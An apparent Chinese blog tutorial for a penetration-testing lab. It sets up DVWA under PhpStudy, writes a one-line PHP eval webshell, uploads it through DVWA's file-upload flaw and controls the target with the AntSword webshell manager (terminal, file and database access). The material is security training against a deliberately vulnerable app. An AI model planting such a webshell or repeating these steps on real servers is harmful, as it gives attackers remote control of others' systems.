渗透测试环境搭建与工具“中国蚁剑”的使用

此资料仅供学习参考,请勿用于非法用途,违者一律承担所有风险

操作机: Windows 10 (安装中国蚁剑)
靶机: Windows 10(安装PhpStudy DVWA,关闭防火墙)ip:192.168.31.131

下载安装包

中国蚁剑:https://pan.baidu.com/s/1V1lvTrArX6lv62Azcegt5w
PhpStudy:https://pan.baidu.com/s/1mW33EQ1MTqU32CQ0LTBlwQ
DVWA:https://pan.baidu.com/s/1We5nieSDi0vQ4aASxsK6Fw

提取码:co6e

实验原理

(1)关于Webshell
Webshell是以ASP、PHP、JSP或者CGI等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
Webshell使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

(2)关于中国蚁剑
蚁剑是一个开放源代码、跨平台的Webshell管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。

实验步骤

1、搭建渗透环境
将PhpStudy、DVWA下载到靶机并解压到相应位置,这里我都解压到桌面

双击PhpStudy2018.exe文件,我选择安装在C盘在这里插入图片描述

等待自解压完成
在这里插入图片描述

PhpStudt已经安装完成
在这里插入图片描述

点击其他选项菜单,先退出PhpStudy
在这里插入图片描述

双击解压后的DVWA文件夹,把里面的DVWA-master文件夹剪贴在安装PhpStudy文件夹下的PHPTutorial/WWW里
在这里插入图片描述

进入DVWA-master/config,把config.inc.php.dist文件改为config.inc.php(删除.dist后缀)然后右键以记事本方式打开此文件
在这里插入图片描述

将config.inc.php文件中MySQL数据库的连接用户名由“dvwa”修改为“root”、密码由“p@ssw0rd”修改为“root”,保存并退出
在这里插入图片描述

接下来启动PhpStudy,双击然后点击启动
在这里插入图片描述
在这里插入图片描述

测试一下环境是否搭建成功,在浏览器中输入http://本地ip/DVWA-master
在这里插入图片描述这样渗透环境已经搭建成功

2、写PHP一句话木马(Webshell)
在操作机桌面新建一个文本文档并更名为muma.php
在这里插入图片描述
在这里插入图片描述

鼠标右键单击muma.php,以记事本的方式打开,在文件中输入以下代码并保存:

<?php @eval($_POST['123456']); ?>

在这里插入图片描述

3、利用靶机的文件上传漏洞,将此木马文件(Webshell)上传至靶机

(1)在操作机上启动浏览器,在地址栏中输入以下URL访问靶机上的DVWA网站(如不是登录界面,滑至页面底端,点击Create/Reset Database按钮)

http://[靶机IP]/DVWA-master

在这里插入图片描述
在这里插入图片描述

(2)成功登录DVWA网站后,在网站主页左侧菜单选择DVWA Security,将网站的安全级别设置为“Low”

在这里插入图片描述

(3)在DVWA网站主页左侧菜单选择“File upload”进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径
在这里插入图片描述

4、利用“中国蚁剑”连接靶机上的muma.php
(1)在操作机上把下载好的蚁剑安装包解压在桌面,进入桌面文件夹AntSword/AntSword-Loader-v4.0.3-win32-x64,鼠标左键双击“AntSword.exe”程序,运行“中国蚁剑”
在这里插入图片描述
在这里插入图片描述

初次运行“中国蚁剑”时,需要初始化。点击“中国蚁剑”主界面的“初始化”按钮,将桌面AntSword/antSword-master指定为“中国蚁剑”的工作目录
在这里插入图片描述

指定完成后,界面会提示手动重启蚁剑程序。可再次进入桌面文件夹/AntSword/AntSword-Loader-v4.0.3-win32-x64,运行“AntSword.exe”程序
在这里插入图片描述

(2)在“中国蚁剑”主界面空白处单击鼠标右键,在弹出的菜单中选择“添加数据”
在这里插入图片描述

添加一条Webshell管理项:

URL地址:http://[靶机IP]/DVWA-master/hackable/uploads/muma.php
连接密码:123456
连接类型:PHP

在这里插入图片描述

设置完成后点击左上角的“添加”按钮,会看到主界面多了一条Webshell管理项
在这里插入图片描述

5、利用“中国蚁剑”对靶机进行虚拟终端及文件操作
(1)虚拟终端操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“虚拟终端”
在这里插入图片描述
打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令(如whoami、id、netstat -an等)
在这里插入图片描述

(2)文件操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“文件管理”
在这里插入图片描述
在这里插入图片描述

打开文件管理界面后,可以像操作本地机器一样,对靶机系统进行一些操作(如上传文件、下载文件、修改文件属性等)
在这里插入图片描述

(3)数据操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“数据操作”
在这里插入图片描述

打开文件管理界面后,可以对靶机上的数据库系统进行一些操作
在这里插入图片描述实验到此结束。

  • 7
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kicock.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值